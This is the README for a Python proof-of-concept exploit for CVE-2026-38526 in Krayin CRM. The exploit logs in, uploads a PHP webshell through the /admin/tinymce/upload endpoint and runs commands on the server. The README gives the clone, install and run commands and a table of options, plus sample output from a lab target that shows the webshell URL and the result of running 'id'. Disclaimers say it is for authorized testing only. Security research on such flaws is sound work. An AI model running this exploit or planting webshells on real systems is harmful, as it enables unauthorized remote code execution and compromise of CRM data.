
Python PoC exploiting CVE-2026-38526 in Krayin CRM <= 2.2.x: authenticated PHP webshell upload via /admin/tinymce/upload leading to remote code execution.
⚠️ Legal disclaimer: this code is provided for educational purposes and for authorized testing only (CTF, bug bounty, private lab). The author is not responsible for any illegal use.
Krayin CRM (Webkul) ≤ 2.2.x exposes the /admin/tinymce/upload
endpoint, which allows an authenticated user (even a low-privilege one)
to upload files without extension validation. The file is then
served from the storage/ folder, allowing arbitrary
PHP code execution.
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
Options:
| Option | Description |
|---|---|
-t, --target | Target root URL |
-u, --user | Krayin account email |
-p, --password | Password |
-c, --command | Command to execute (default: id) |
--login-path | Login path (default: /admin/login) |
--upload-path | Upload path (default: /admin/tinymce/upload) |
--timeout | HTTP timeout (default: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] Retrieving CSRF token from http://billing.nexus.htb/admin/login
[*] Sending login form
[+] Authentication successful
[*] Uploading x8f2k1ab.php via http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessible: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Executing: id
============================================================
[+] Command: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ and uploads/ folders.This project is published for security research purposes. Any use against systems without prior written authorization is illegal and strictly prohibited.